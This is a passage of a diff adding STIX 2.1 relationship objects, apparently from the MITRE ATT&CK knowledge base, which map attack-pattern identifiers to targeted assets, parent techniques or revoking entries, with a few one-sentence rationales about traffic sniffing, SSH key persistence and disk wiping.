"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--59e4bc92-a9b4-4301-81a6-2c1e62c6609c", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--59f6a55f-af15-4420-bb0e-d624e6a46d0d", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5a0b5cd0-251c-468b-b8a7-7bd24fd2445d", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5a164fe1-d139-4715-beef-be381d746e21", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5a27ec6c-3a00-42ec-95a7-83f1422c4ba0", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5a315f4c-acb0-40a2-8584-8f102125f45e", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d273434a-448e-4598-8e14-607f4a0d5e27", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5a3d26a5-3b43-4c2d-9aec-8f2e0627fe16", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5a5b75bd-a487-45da-aa19-a2c4a2464b99", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5a67ece5-7409-4eb5-8c64-4a67e2f52776", + "created": "2020-03-09T14:15:05.754Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56", + "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5a742223-f67f-447f-af86-5ed546f8476b", + "created": "2020-10-02T16:27:55.863Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--6ee2dc99-91ad-4534-a7d8-a649358c331f", + "target_ref": "attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5a97008b-c23b-4890-ba76-c30cf2a18fba", + "created": "2023-09-28T20:07:36.295Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:07:36.295Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5ab22f47-9b5f-4a83-aab0-7f27fa0d7a85", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5aba87fa-61f4-4ae6-ac49-45954e3f0bf1", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5ace7074-5eee-4aca-bb4f-d0dcf2c6342e", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5addc993-01a1-4690-a899-8634bf540cea", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5af5e202-53a4-40f6-bbe2-f69f5cb72a0f", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5b0a440d-575a-4c1a-97aa-56945686f85a", + "created": "2020-03-27T21:06:33.285Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f", + "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5b0d4345-441a-4491-8f97-cf6250cac4e6", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5b0fbc3f-32ca-4c8e-b470-99f8567e2d78", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5b13a608-dc78-463c-bf02-5a22ee304912", + "created": "2024-05-22T17:23:33.702Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T02:14:31.314Z", + "description": "Asset Mapping Rationale: Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network.", + "relationship_type": "targets", + "source_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5b14c813-09e2-4709-ab42-94830cf9538c", + "created": "2023-09-29T18:42:39.876Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:42:39.876Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5b1913c7-6013-4aa1-935a-f9f6acb08bf0", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4eb28bed-d11a-4641-9863-c2ac017d910a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5b37828a-67db-4d36-831f-be0a6c3003b6", + "created": "2020-03-19T15:08:50.236Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--e99ec083-abdd-48de-ad87-4dbf6f8ba2a4", + "target_ref": "attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5b391743-83ec-43c8-a156-4ded2b623293", + "created": "2024-05-22T15:32:28.224Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-22T15:32:28.224Z", + "description": "Asset Mapping Rationale: Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. SSH keys can also be added to accounts on network devices, such as with the ip ssh pubkey-chain Network Device CLI command. ", + "relationship_type": "targets", + "source_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5b49d526-0027-48c6-9d11-867fdd2094f7", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5b532b0e-af0b-4c02-9bc2-3037f9939278", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5b533edb-686f-4c74-8306-43742bfdf200", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5b6ff1ab-eeca-43bc-8cd5-156bd8d3df8a", + "created": "2021-03-31T14:01:52.511Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f8ef3a62-3f44-40a4-abca-761ab235c436", + "target_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5b90e829-bddc-47d3-8837-1d7738ac651a", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5ba877f8-9166-4d95-8b0e-555a1f20a782", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5bb412b7-f25e-4b53-a760-b3378d2e0474", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5bb6d435-f9a8-4309-8a2e-b4b17f54658e", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--494ab9f0-36e0-4b06-b10d-57285b040a06", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5bc906b5-fd38-4c15-a674-c1a75cbb2c06", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5bd93759-b6da-406e-ad99-5a8041e8dd71", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5bda6db3-c05b-4733-8935-a11dfc30c64d", + "created": "2020-03-30T20:17:22.228Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5bde01dc-6c27-4494-a3eb-7a7d98982477", + "created": "2020-03-02T19:30:53.662Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--d3df754e-997b-4cf9-97d4-70feb3120847", + "target_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5bf0b5fd-d626-406a-9aa4-17b87b921b2d", + "created": "2024-05-23T04:17:04.199Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T02:15:45.464Z", + "description": "Asset Mapping Rationale: Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.", + "relationship_type": "targets", + "source_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5bf44902-cdb5-4063-9f67-a6c0fe6b8c0f", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + 